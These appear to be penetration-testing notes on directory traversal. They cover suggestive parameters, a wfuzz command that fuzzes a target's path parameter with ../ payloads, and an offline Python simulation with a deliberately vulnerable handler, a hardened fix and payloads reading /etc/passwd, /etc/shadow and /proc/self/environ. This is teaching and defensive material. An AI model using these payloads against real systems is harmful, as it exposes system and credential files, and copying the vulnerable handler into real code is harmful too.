This section covers directory traversal attacks: leaking sensitive files from a web application by supplying attacker-controlled file paths (typically built from ../ sequences, or an absolute path) through URL parameters, HTML form fields, cookies and any other input the server turns into a filesystem path.

Suggestive parameters

Suggestive parameters are keywords to watch for while enumerating a web application: endpoint paths and parameter names that hint the server is opening something on disk on our behalf. Two patterns are worth noting. The first is a path-based endpoint, where the remainder of the URL may be used as a filesystem path. If the endpoint we're targeting is something like:

GET /search/ HTTP/1.1

we might be able to append arbitrary file paths and discover files on the host. The second is a query or body parameter whose value names a file, for example:

GET /site/victim/lookup?file=<FILE_PATH> HTTP/1.1

where file is a parameter we can use to provide arbitrary paths. Names such as file, path, page, template, doc, dir and include are the usual suspects, but the value is the real tell: anything that looks like a filename or a relative path is a candidate, whether it arrives in a GET query string, a POST body or a cookie.

Fuzzing

Similar to what we covered here, we can fuzz a suspected directory traversal parameter for readable files using wfuzz and a wordlist of well-known paths. An example usage looks like:

wfuzz -c -z file,/usr/share/seclists/Fuzzing/LFI/LFI-Jhaddix.txt -u "http://victim-site/files?path=../../../../../../../../../../FUZZ"

Here we're using the SecLists wordlist, also discussed here, to fuzz the victim web application for directory traversal and local file inclusion (LFI) vulnerabilities. Strictly, traversal reads a file and returns it, while LFI includes and executes it, but the same payloads find both, which is why the wordlist carries the LFI name. The long run of ../ in front of FUZZ is deliberate: on Linux, ../ sequences that climb above the filesystem root are simply discarded, so overshooting is harmless while undershooting misses the target. Many wordlist entries already start with ../, which just makes the overshoot longer. Most applications answer a missing file with a 200 and an error page rather than a 404, so filtering on status code (--hc 404) is often not enough; if we know the length of a bad response from the web application vs. a good response, we can hide the bad ones with the --hh <length> parameter for wfuzz (the Chars column in its output), or with --hl and --hw for line and word counts.
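The following added example is not part of the original notes: it models both passages above in Python, a lookup handler with a suggestive path parameter in its vulnerable and hardened forms, and a wfuzz-style loop that substitutes wordlist entries for FUZZ and hides responses by length. The filesystem, document root, wordlist and 404 body are all constructed for the example so it runs offline; posixpath.commonpath is the hardening check assumed here, not anything from the page.

```python
import posixpath
from urllib.parse import unquote

# Constructed stand-in for the target host's filesystem (absolute path -> contents).
FAKE_FS = {
    "/var/www/files/readme.txt": "Welcome to the file share.\n",
    "/var/www/files/report.pdf": "%PDF-1.4 (constructed sample)\n",
    "/etc/passwd": "root:x:0:0:root:/root:/bin/bash\n"
                   "www-data:x:33:33::/var/www:/usr/sbin/nologin\n",
    "/proc/self/environ": "PATH=/usr/bin\x00HOME=/var/www\x00",
}
DOC_ROOT = "/var/www/files"          # assumed directory the app intends to serve from
NOT_FOUND = "404 Not Found\n"        # the "bad response" whose length we filter on
TRAVERSAL_PREFIX = "../" * 10        # same overshooting prefix as the wfuzz command

# Constructed mini wordlist in the style of LFI-Jhaddix.txt: relative paths,
# entries that already carry ../, and a URL-encoded variant.
WORDLIST = [
    "etc/passwd",
    "etc/shadow",
    "proc/self/environ",
    "windows/win.ini",
    "../../etc/passwd",
    "%2e%2e/%2e%2e/etc/passwd",
]


def resolve(path_param: str) -> str:
    """What the app does with ?path=: URL-decode once, join under DOC_ROOT, normalise.
    posixpath.join discards DOC_ROOT if the parameter is absolute, and normpath
    collapses ../ sequences (extra ones above / are dropped), which is exactly
    how the traversal escapes the intended directory."""
    return posixpath.normpath(posixpath.join(DOC_ROOT, unquote(path_param)))


def vulnerable_lookup(path_param: str) -> str:
    """Deliberately vulnerable: the resolved path is never checked against DOC_ROOT."""
    return FAKE_FS.get(resolve(path_param), NOT_FOUND)


def hardened_lookup(path_param: str) -> str:
    """Fixed: reject anything that does not stay inside DOC_ROOT after normalisation.
    commonpath (rather than str.startswith) also rejects /var/www/files_secret/x.
    On a real host, resolve with os.path.realpath first so symlinks cannot escape."""
    full = resolve(path_param)
    if posixpath.commonpath([DOC_ROOT, full]) != DOC_ROOT:
        return NOT_FOUND
    return FAKE_FS.get(full, NOT_FOUND)


def fuzz(lookup, wordlist, prefix=TRAVERSAL_PREFIX, hide_len=None):
    """wfuzz-style loop: put each payload where FUZZ sits, record (payload, length),
    and hide responses whose body length equals hide_len, like wfuzz --hh."""
    hits = []
    for word in wordlist:
        body = lookup(prefix + word)
        if hide_len is not None and len(body) == hide_len:
            continue
        hits.append((word, len(body)))
    return hits


if __name__ == "__main__":
    # Calibrate the "bad response" length with a file that certainly does not exist.
    bad_len = len(vulnerable_lookup("this-file-does-not-exist"))
    print("vulnerable handler hits:", fuzz(vulnerable_lookup, WORDLIST, hide_len=bad_len))
    print("hardened handler hits:  ", fuzz(hardened_lookup, WORDLIST, hide_len=bad_len))
    print("legitimate request still works:", hardened_lookup("readme.txt").strip())
```

Against the vulnerable handler the loop reports etc/passwd, proc/self/environ and both ../-prefixed variants, while etc/shadow and windows/win.ini disappear behind the length filter; against the hardened handler every traversal payload collapses to the 404 length and nothing is reported, while readme.txt is still served.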